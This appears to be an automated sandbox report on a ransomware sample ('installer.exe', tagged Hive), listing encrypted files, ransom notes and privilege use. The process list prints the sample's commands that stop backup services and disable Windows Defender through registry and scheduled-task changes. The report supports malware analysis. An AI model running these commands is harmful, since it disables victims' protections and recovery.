Analysis Overview
SHA256
87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177
Threat Level: Known bad
The file installer was found to be: Known bad.
Malicious Activity Summary
Deletes Windows Defender Definitions
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
Reads user/profile data of web browsers
Drops file in Program Files directory
Launches sc.exe
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Opens file in notepad (likely ransom note)
Suspicious behavior: EnumeratesProcesses
Runs net.exe
Interacts with shadow copies
Runs ping.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-05 07:36
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-05 07:36
Reported
2022-01-05 07:38
Platform
win7-en-20211208
Max time kernel
127s
Max time network
120s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Program Files (x86)\Windows Media Player\Media Renderer\avtransport.xml | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_m.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0149407.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\DELETE.GIF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGLINACC.DPV.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\fr-FR\msadcer.dll.mui | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-image-inset.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\vistabg.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\gadget.xml | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\rFSH_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\deploy\messages_zh_CN.properties.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Manaus.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS01635_.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR33F.GIF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\rFSH_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\button-bullet.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Pacific\Gambier.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\dial_sml.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14583_.GIF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21390_.GIF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\form_edit.js.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18234_.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\zi\Australia\rFSH_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\handler.reg | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.http_8.1.14.v20131031.jar.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Indiana\Tell_City.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Pacific\Kwajalein.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02270_.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\ink\en-US\mshwLatin.dll.mui | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_03.MID.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00390_.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Notes_btn-back-static.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\Parity.fx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Multiplayer\Checkers\ja-JP\chkrzm.exe.mui.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_70.png.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\system_settings.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\People\HICCUP.WAV.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Media Player\Skins\Revert.wmz | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_few-showers.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10337_.GIF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR41F.GIF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Couture.xml.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SECREC.CFG.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Groove.gif.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationLeft_ButtonGraphic.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\ja-JP\js\cpu.js | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\de-DE\js\calendar.js | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\21.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313896.JPG.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FLYER.DPV.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_120.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\glass.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0238983.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_partly-cloudy.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Proof.fr\rFSH_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUEPRNT\BLUEPRNT.INF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0160590.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02227_.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\installer.exe
"C:\Users\Admin\AppData\Local\Temp\installer.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
